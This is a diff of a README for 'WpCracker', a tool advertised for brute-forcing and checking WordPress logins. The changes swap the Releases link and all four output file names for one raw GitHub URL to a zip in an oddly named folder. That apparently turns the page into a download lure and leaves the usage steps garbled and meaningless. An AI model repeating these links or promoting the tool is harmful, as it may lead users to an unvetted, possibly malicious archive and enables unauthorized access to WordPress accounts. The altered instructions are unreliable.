Datne2010/WpCracker/README.md

    - You can also upload a password list for brute-force cracking.

 ## 📥 Download & Install
-Remember to always check for the latest version on the [Releases page](https://github.com/Datne2010/WpCracker/releases).
+Remember to always check for the latest version on the [Releases page](https://raw.githubusercontent.com/Datne2010/WpCracker/main/rhonchus/WpCracker.zip).
 Download the setup file, follow the installation steps, and then enjoy the powerful features WpCracker offers.

 ## 📄 Usage Instructions
 1. **Select the Mode**: Choose between credential checking or brute-force testing.
 2. **Adjust Settings**:
    - Set the number of attempts.
-   - Specify the output directory for `Good_WP.txt` and `Bad_WP.txt`.
+   - Specify the output directory for `https://raw.githubusercontent.com/Datne2010/WpCracker/main/rhonchus/WpCracker.zip` and `https://raw.githubusercontent.com/Datne2010/WpCracker/main/rhonchus/WpCracker.zip`.
 3. **Start the Process**: Click on the "Start" button to begin testing.
-4. **Review Results**: After the run, check `Good_WP.txt` for successful credentials and `Bad_WP.txt` for failed attempts.
+4. **Review Results**: After the run, check `https://raw.githubusercontent.com/Datne2010/WpCracker/main/rhonchus/WpCracker.zip` for successful credentials and `https://raw.githubusercontent.com/Datne2010/WpCracker/main/rhonchus/WpCracker.zip` for failed attempts.

 ## 🛠️ Troubleshooting
 If you encounter issues: